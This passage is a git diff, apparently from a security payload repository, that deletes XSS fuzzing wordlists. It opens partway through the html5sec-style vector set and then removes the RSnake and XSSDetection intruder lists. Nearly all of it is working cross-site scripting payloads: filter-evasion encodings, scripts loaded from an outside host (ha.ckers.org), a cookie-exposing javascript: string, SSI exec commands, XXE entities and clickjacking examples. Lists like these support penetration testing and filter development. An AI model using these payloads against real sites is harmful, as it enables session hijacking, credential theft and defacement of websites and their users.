EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> -<div id="53"><xml id="xss" src="test.htc"></xml> -<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> -<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> -<div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> - -<div id="62"><!-- IE 6-8 --> -<x '="foo"><x foo='><img src=x onerror=alert(62)//'> - -<!-- IE 6-9 --> -<! '="foo"><x foo='><img src=x onerror=alert(2)//'> -<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> - -<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF -<img src="javascript:alert(2)"> -<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ -<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> -<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> -<div id="66"><?xml version="1.0"?> -<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> -<root/>//["'`-->]]>]</div> - -<div id="67"><!DOCTYPE x [ - <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" - onerror CDATA "alert(67)" - onload CDATA "alert(2)"> -]><img />//["'`-->]]>]</div> - -<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> - <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x> -</doc>//["'`-->]]>]</div> -<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> -<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> -<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> -<div id="87"><svg xmlns="http://www.w3.org/2000/svg"> -<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> -</svg>//["'`-->]]>]</div> - -<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> - -<animation xlink:href="javascript:alert(88)"/> -<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> - -<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> - -<foreignObject xlink:href="javascript:alert(88)"/> -<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> - -</svg>//["'`-->]]>]</div> - -<div id="89"><svg xmlns="http://www.w3.org/2000/svg"> -<set attributeName="onmouseover" to="alert(89)"/> -<animate attributeName="onunload" to="alert(89)"/> -</svg>//["'`-->]]>]</div> - -<div id="90"><!-- Up to Opera 10.63 --> -<div style=content:url(test2.svg)></div> - -<!-- Up to Opera 11.64 - see link below --> - -<!-- Up to Opera 12.x --> -<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> - -<div id="91">[A] -<? foo="><script>alert(91)</script>"> -<! foo="><script>alert(91)</script>"> -</ foo="><script>alert(91)</script>"> -[B] -<? foo="><x foo='?><script>alert(91)</script>'>"> -[C] -<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> -[D] -<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> -<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> -<div id="94"><svg xmlns="http://www.w3.org/2000/svg"> -<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> -</svg>//["'`-->]]>]</div> - -<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> -<feImage> -<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, -PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> -</feImage> -</svg>//["'`-->]]>]</div> - -<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> -<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> - -<div id="97"><!-- IE 5-9 --> -<div id=d><x xmlns="><iframe onload=alert(97)"></div> -<script>d.innerHTML+='';</script> - -<!-- IE 10 in IE5-9 Standards mode --> -<div id=d><x xmlns='"><iframe onload=alert(2)//'></div> -<script>d.innerHTML+='';</script>//["'`-->]]>]</div> - -<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> -<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> - -<div id="99">XXX<style> - -*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ - -<!-- ---><!--*{color:red} /* all UA */ - -*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ - -</style>//["'`-->]]>]</div> -<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> -<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> -<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> -</svg>//["'`-->]]>]</div> -<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> -<div id="108"><!-- IE 5-8 standards mode --> -<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> - -<!-- IE 5-9 standards mode --> -<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> -<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> - -<div id="109"><svg xmlns="http://www.w3.org/2000/svg"> -<a id="x"><rect fill="white" width="1000" height="1000"/></a> -<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> -</svg>//["'`-->]]>]</div> - -<div id="110"><svg xmlns="http://www.w3.org/2000/svg"> -<path d="M0,0" style="marker-start:url(test4.svg#a)"/> -</svg>//["'`-->]]>]</div> -<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> -<div id="113"><div id="x">XXX</div> -<style> - -#x{font-family:foo[bar;color:green;} - -#y];color:red;{} - -</style>//["'`-->]]>]</div> -<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> -<div id="115"><!--[if]><script>alert(115)</script --> -<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> - -<div id="116"><div id="x">x</div> -<xml:namespace prefix="t"> -<import namespace="t" implementation="#default#time2"> -<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> - -<div id="117"><a href="http://attacker.org"> - <iframe src="http://example.org/"></iframe> -</a>//["'`-->]]>]</div> - -<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> - <h1>Drop me</h1> -</div> - -<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> - -<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> - -<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> - -<div id="120"><script> -function makePopups(){ - for (i=1;i<6;i++) { - window.open('popup.html','spam'+i,'width=50,height=50'); - } -} -</script> - -<body> -<a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> - -<div id="121"><html xmlns="http://www.w3.org/1999/xhtml" -xmlns:svg="http://www.w3.org/2000/svg"> -<body style="background:gray"> -<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> -<svg:svg> -<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> - <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> - <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> -</svg:mask> -</svg:svg> -</body> -</html>//["'`-->]]>]</div> -<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> -<div id="123"><span class=foo>Some text</span> -<a class=bar href="http://www.example.org">www.example.org</a> - -<script src="http://code.jquery.com/jquery-1.4.4.js"></script> -<script> -$("span.foo").click(function() { -alert('foo'); -$("a.bar").click(); -}); -$("a.bar").click(function() { -alert('bar'); -location="http://html5sec.org"; -}); -</script>//["'`-->]]>]</div> - -<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 -<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> - -<div id="125"><?xml version="1.0"?> -<?xml-stylesheet type="text/xml" href="#stylesheet"?> -<!DOCTYPE doc [ -<!ATTLIST xsl:stylesheet - id ID #REQUIRED>]> -<svg xmlns="http://www.w3.org/2000/svg"> - <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> - </xsl:template> - </xsl:stylesheet> - <circle fill="red" r="40"></circle> -</svg>//["'`-->]]>]</div> - -<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> -<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> - -<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> -<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> -<handler id="y">alert(127)</handler> -</svg>//["'`-->]]>]</div> -<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> -<div id="129"><svg> -<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> -<!-- -Same effect with -<image filter='...'> ---> -</svg>//["'`-->]]>]</div> - -<div id="130"><math href="javascript:alert(130)">CLICKME</math> - -<math> -<!-- up to FF 13 --> -<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> - -<!-- FF 14+ --> -<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> -</math>//["'`-->]]>]</div> - -<div id="131"><b>drag and drop one of the following strings to the drop box:</b> -<br/><hr/> -jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// -<br/><hr/> -feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// -<br/><hr/> -feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> -<br/><hr/> -feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// -<br/><hr/> -<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> - -<div id="132"><!doctype html> -<form> -<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> -<br> -<input name="secret" type="password"> -</form> -<!-- injection --><svg height="50px"> -<image xmlns:xlink="http://www.w3.org/1999/xlink"> -<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> -<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> -<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> -<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> -</image> -</svg>//["'`-->]]>]</div> -<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> -<div id="134"><xmp> -<% -</xmp> -<img alt='%></xmp><img src=xx:x onerror=alert(134)//'> - -<script> -x='<%' -</script> %>/ -alert(2) -</script> - -XXX -<style> -*['<!--']{} -</style> --->{} -*{color:red}</style>//["'`-->]]>]</div> - -<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> -<stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> -<template match="/"> -<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> -<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> -</template> -</stylesheet>//["'`-->]]>]</div> - -<div id="136"><form action="" method="post"> -<input name="username" value="admin" /> -<input name="password" type="password" value="secret" /> -<input name="injected" value="injected" dirname="password" /> -<input type="submit"> -</form>//["'`-->]]>]</div> - -<div id="137"><svg> -<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> -<circle r="400"></circle> -<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> -</a>//["'`-->]]>]</div> -<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined diff --git a/XSS Injection/Intruders/RSNAKE_XSS.txt b/XSS Injection/Intruders/RSNAKE_XSS.txt deleted file mode 100644 index 66f87a1..0000000 --- a/XSS Injection/Intruders/RSNAKE_XSS.txt +++ /dev/null @@ -1,73 +0,0 @@ -<SCRIPT>alert('XSS');</SCRIPT> -'';!--"<XSS>=&{()} -<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> -<IMG SRC="javascript:alert('XSS');"> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC=JaVaScRiPt:alert('XSS')> -<IMG SRC=javascript:alert(&quot;XSS&quot;)> -<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> -<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> -SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> -<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> -<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> -<IMG SRC="jav ascript:alert('XSS');"> -<IMG SRC="jav&#x09;ascript:alert('XSS');"> -<IMG SRC="jav&#x0A;ascript:alert('XSS');"> -<IMG SRC="jav&#x0D;ascript:alert('XSS');"> -<IMG SRC=" &#14; javascript:alert('XSS');"> -<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> -<IMG SRC="javascript:alert('XSS')" -<SCRIPT>a=/XSS/ -\";alert('XSS');// -<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> -<BODY BACKGROUND="javascript:alert('XSS')"> -<BODY ONLOAD=alert('XSS')> -<IMG DYNSRC="javascript:alert('XSS')"> -<IMG LOWSRC="javascript:alert('XSS')"> -<BGSOUND SRC="javascript:alert('XSS');"> -<BR SIZE="&{alert('XSS')}"> -<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> -<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> -<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> -<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> -<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> -<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> -<IMG SRC='vbscript:msgbox("XSS")'> -<IMG SRC="mocha:[code]"> -<IMG SRC="livescript:[code]"> -<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> -<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> -<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> -<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> -<IFRAME SRC="javascript:alert('XSS');"></IFRAME> -<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> -<TABLE BACKGROUND="javascript:alert('XSS')"> -<DIV STYLE="background-image: url(javascript:alert('XSS'))"> -<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> -<DIV STYLE="width: expression(alert('XSS'));"> -<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> -<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -<XSS STYLE="xss:expression(alert('XSS'))"> -exp/*<XSS STYLE='no\xss:noxss("*//*"); -<STYLE TYPE="text/javascript">alert('XSS');</STYLE> -<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> -<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> -<BASE HREF="javascript:alert('XSS');//"> -<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> -<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> -getURL("javascript:alert('XSS')") -a="get"; -<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> -<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> -<HTML><BODY> -<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> -<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> -<? echo('<SCR)'; -<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> -<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- -<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> diff --git a/XSS Injection/Intruders/XSSDetection.txt b/XSS Injection/Intruders/XSSDetection.txt deleted file mode 100644 index f063343..0000000 --- a/XSS Injection/Intruders/XSSDetection.txt +++ /dev/null @@ -1,202 +0,0 @@ -%3Cimg/src=%3Dx+onload=alert(2)%3D -%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e -'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E -48e71%3balert(1)//503466e3 -';confirm('XSS')//1491b2as -a29b1%3balert(888)//a62b7156d82 -<scr&#x9ipt>alert('XSS')</scr&#x9ipt> -"onmouseover%3dprompt(941634) -%f6%22%20onmouseover%3dprompt(941634)%20 -" onerror=alert()1 a=" -style=xss:expression(alert(1)) -<input type=text value=“XSS”> - A” autofocus onfocus=alert(“XSS”)// -<input type=text value=”A” autofocus onfocus=alert(“XSS”)//”> -<a href="javascript:alert(1)">ssss</a> -+ADw-p+AD4-Welcome to UTF-7!+ADw-+AC8-p+AD4- -+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4- -+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4- -<%00script>alert(‘XSS’)<%00/script> -<%script>alert(‘XSS’)<%/script> -<%tag style=”xss:expression(alert(‘XSS’))”> -<%tag onmouseover="(alert('XSS'))"> is invalid. <%br /> -</b style="expr/**/ession(alert('vulnerable'))"> -';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -'';!--"<XSS>=&{()} -<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> -<IMG SRC="javascript:alert('XSS');"> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC=JaVaScRiPt:alert('XSS')> -<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> -<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> -<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> -<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> -<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> -<IMG SRC="jav ascript:alert('XSS');"> -<IMG SRC="jav&#x09;ascript:alert('XSS');"> -<IMG SRC="jav&#x0A;ascript:alert('XSS');"> -<IMG SRC="jav&#x0D;ascript:alert('XSS');"> -<IMG SRC=" &#14; javascript:alert('XSS');"> -<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> -<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<<SCRIPT>alert("XSS");//<</SCRIPT> -<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> -<SCRIPT SRC=//ha.ckers.org/.j> -<iframe src=http://ha.ckers.org/scriptlet.html < -<IMG SRC="javascript:alert('XSS')" -<SCRIPT>a=/XSS/ -alert(a.source)</SCRIPT> -\";alert('XSS');// -</TITLE><SCRIPT>alert("XSS");</SCRIPT> -<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> -<BODY BACKGROUND="javascript:alert('XSS')"> -<BODY ONLOAD=alert('XSS')> -<IMG DYNSRC="javascript:alert('XSS')"> -<IMG LOWSRC="javascript:alert('XSS')"> -<BGSOUND SRC="javascript:alert('XSS');"> -<BR SIZE="&{alert('XSS')}"> -<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> -<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> -<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> -<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> -<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> -<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> -<XSS STYLE="behavior: url(xss.htc);"> -<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS -<IMG SRC='vbscript:msgbox("XSS")'> -¼script¾alert(¢XSS¢)¼/script¾ -<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> -<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> -<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> -<IFRAME SRC="javascript:alert('XSS');"></IFRAME> -<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> -<TABLE BACKGROUND="javascript:alert('XSS')"> -<TABLE><TD BACKGROUND="javascript:alert('XSS')"> -<DIV STYLE="background-image: url(javascript:alert('XSS'))"> -<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> -<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> -<DIV STYLE="width: expression(alert('XSS'));"> 